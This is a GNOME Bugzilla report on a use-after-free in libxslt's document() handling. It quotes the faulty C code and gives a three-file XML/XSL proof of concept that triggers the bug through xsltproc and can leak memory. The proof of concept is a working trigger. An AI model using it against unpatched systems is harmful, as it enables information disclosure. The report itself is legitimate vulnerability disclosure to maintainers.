After an evaluation, GNOME has moved from Bugzilla to GitLab. Learn more about GitLab.
No new issues can be reported in GNOME Bugzilla anymore.
To report an issue in a GNOME project, go to GNOME GitLab.
Do not go to GNOME Gitlab for: Bluefish, Doxygen, GnuCash, GStreamer, java-gnome, LDTP, NetworkManager, Tomboy.
Bug 758291 - UAF in xsltDocumentFunctionLoadDocument
UAF in xsltDocumentFunctionLoadDocument
Status: RESOLVED FIXED
Product: libxslt
Classification: Platform
Component: general
git master
Other Linux
: Normal normal
: ---
Assigned To: Daniel Veillard
libxml QA maintainers
Depends on:
Blocks:
 
 
Reported: 2015-11-18 15:35 UTC by Sebastian Apelt
Modified: 2016-11-05 13:33 UTC
See Also:
GNOME target: ---
GNOME version: ---

Attachments
poc.tgz contains the 3 files mentioned above for reproduction (527 bytes, application/x-gzip)
2015-11-18 15:35 UTC, Sebastian Apelt 		Details

Description Sebastian Apelt 2015-11-18 15:35:34 UTC 
Created attachment 315836 [details]
poc.tgz contains the 3 files mentioned above for reproduction

the UAF can be triggered via xsltproc:

sebastian@hackpot:/xslt-tests/poc$ xsltproc poc.xml
runtime error: file poc.xsl line 9 element copy-of
document() : XPointer does not select a node set: #▒▒▒▒{
no result for poc.xml

version used: 

sebastian@hackpot:/xslt-tests/poc$ xsltproc -version
Using libxml 20901, libxslt 10128 and libexslt 817
xsltproc was compiled against libxml 20901, libxslt 10128 and libexslt 817
libxslt 10128 was compiled against libxml 20901
libexslt 817 was compiled against libxml 20901

garbage is displayed after the error message since the referenced string has been freed before. the responsilbe function is xsltDocumentFunctionLoadDocument in functions.c:

static void
xsltDocumentFunctionLoadDocument(xmlXPathParserContextPtr ctxt, xmlChar* URI)
{
[...]
    xmlFree(fragment);    <- FREE the fragment

    if (resObj == NULL)
	goto out_fragment;

    switch (resObj->type) {
	case XPATH_NODESET:
	    break;
	case XPATH_UNDEFINED:
	case XPATH_BOOLEAN:
	case XPATH_NUMBER:
	case XPATH_STRING:
	case XPATH_POINT:
	case XPATH_USERS:
	case XPATH_XSLT_TREE:
	case XPATH_RANGE:
	case XPATH_LOCATIONSET:
	    xsltTransformError(tctxt, NULL, NULL,
		"document() : XPointer does not select a node set: #%s\n",
		fragment);   <- Re-use it in error message
	goto out_object;
    }


poc.xml:
--------
<?xml-stylesheet href="poc.xsl" type="text/xsl"?>
<in>data.xml#xpointer(id('X')/range-to(id('Y')))</in>


poc.xsl:
--------
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="in">
    <annotation>
      <xsl:copy-of select="."/>
      <value>
        <xsl:copy-of select="document(.)"/>
      </value>
    </annotation>
  </xsl:template>
  <xsl:template match="@*|node()">
    <xsl:apply-templates/>
  </xsl:template>
</xsl:stylesheet>


data.xml:
---------
<!DOCTYPE test [ <!ATTLIST A id ID #REQUIRED> ] >
<test>
  <A id="X"/>
  <A id="Y"/>
</test>


this bug can - to a limited extent - be abused for an information leak. 

regards
-sebastian
Comment 2 Salvatore Bonaccorso 2016-11-05 12:33:26 UTC 
Hi

Can you clarify if this is the issue as referenced with the CVE-2016-1841?

Cf. https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1841.html

Regards,
Salvatore